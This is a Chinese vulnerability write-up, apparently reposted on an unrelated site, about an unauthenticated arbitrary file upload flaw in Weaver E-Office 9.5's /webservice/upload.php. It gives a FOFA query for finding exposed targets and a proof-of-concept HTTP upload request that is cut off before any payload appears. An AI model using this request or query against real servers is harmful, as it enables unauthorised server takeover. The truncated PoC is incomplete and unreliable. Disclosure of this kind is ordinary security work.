泛微E

您所在的位置:网站首页 移动办公oa 手机上传文件 泛微E

泛微E

2024-07-04 07:48| 来源: 网络整理| 查看: 265

0x01 产品简介

     泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。

0x02 漏洞概述

     泛微e-office 9.5版本源文件/webservice/upload.php接口处存在任意文件上传漏洞,未经身份验证的恶意攻击者可以上传恶意文件,从而获取目标服务器的控制权限。

0x03 影响范围

 泛微 E-Office 9.5 

0x04 复现环境 

FOFA:app="泛微-EOffice"

21d5a9f680974761adb90b5e27347964.png

0x05 漏洞复现

PoC

POST /webservice/upload.php HTTP/1.1 Host: your-ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl Accept-Encoding: gzip Connection: close ------WebKitFormBoundaryakbyiukl Content-Disposition: form-data; name="file"; filename=&


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3